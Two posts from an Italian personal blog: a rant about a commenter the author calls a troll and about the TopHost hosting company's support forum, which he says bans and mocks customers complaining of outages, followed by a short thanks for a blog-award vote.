L’articolo che vedete (non lo linko perchè non voglio regalargli nemmeno la dignità di un trackback, cmq avete sia l’indirizzo del blog che il titolo del post, è facile trovarlo…se volete proprio farvi cosi tanto del male ) è di un certo “camu” alias “due chiacchiere” su friendfeed, questo utente è venuto tempo fa su questo blog appositamente per scatenare flame nei commenti, come da sua stessa ammissione, il mio errore – purtroppo – è stato quello di dargli retta, alla fine siccome il suo scopo era distogliere l’attenzione, esaurito il flame ho ripulito i commenti e li ho piazzati nella cartella dei commenti spam, ed ho negato futuri accessi al troll in questione…

ma purtroppo l’arma più pericolosa che un troll può avere è un proprio blog, e infatti l’utente (o utonto? decidetelo voi…) è corso subito a pubblicizzare la cosa additandomi come un censore eccetera…

Come se non bastasse vengo a sapere che giusto stamani effe8, amministratore del forum “esterno” (a loro dire) a tophost, prozone, ha bannato xal, un cliente tophost che inizialmente si era lamentato dei continui down di uno dei nodi dell’infrastruttura, e che poi si è visto cancellare il topic in cui chiedeva assistenza perchè era sfociato, come al solito, in un flame grazie agli insulti ed alle prese in giro del “collaboratore” nonchè ex-moderatore del forum, Volverine.

Seguito poi da un altro cliente tophost, Elearning Works, che a seguito di un suo messaggio nei confronti di un utente che difendeva a spada tratta l’ azienda, è stato ammonito (e quindi presumo gli sia stato negato temporaneamente l’accesso al forum).

Insomma, il forum è stato creato per dare assistenza ai clienti, però se questi si lamentano vengono:

1. derisi
2. bannati/ammoniti

se invece non fai altro che scrivere lodi al servizio tophost vieni considerato il miglior utente in circolazione.

È evidente che sono alla canna del gas, non sanno gestire la propria infrastruttura ne i rapporti coi propri clienti, il nodo 8 infatti ha problemi da un sacco di tempo gli utenti che si lamentano della scarsa qualità del servizio sono in tanti, ma a tophost sembra non importare per loro la cosa importante è cercare su google “miglior hosting italiano” e vedere che sono in prima pagina, peccato che il risultato in questione fa capo ad una loro pagina ottimizzata, evidentemente, con le keyword di cui sopra e dove – guardacaso – scrivono solo utenti (veri? chi lo sa..) soddisfatti.

Riguardo la mia esperienza gli unici utenti che non si lamentano, ma che naturalmente non giustificano nemmeno questo comportamento, sono quelli che usano tophost come parcheggio per i domini o come gestore lowcost per i loro dns, chi deve utilizzare tophost come hosting web vero e proprio si lamenta (o almeno tenta di farlo).

Adesso, alla luce dei fatti, tu visitatore che tramite google [spero] sei finito su queste pagine, sei davvero sicuro di voler affidare i tuoi soldi ed i tuoi servizi a un gestore cosi?

Diffondete più che potete per favore.

Il titolo a carattere sensazionalista è puramente intenzionale

Questo è un post  per ringraziare pubblicamente killeader che ha votato questo blog per i macchianera blog awards, in quale categoria non si sa, probabilmente come “miglior blog per il cazzeggio”

Sono ben cosciente che quel voto resterà unico infatti non ho mai preteso di partecipare visti i colossi che ogni anno concorrono; ma insomma certe notizie fanno sempre piacere e quindi è doveroso ringraziarlo.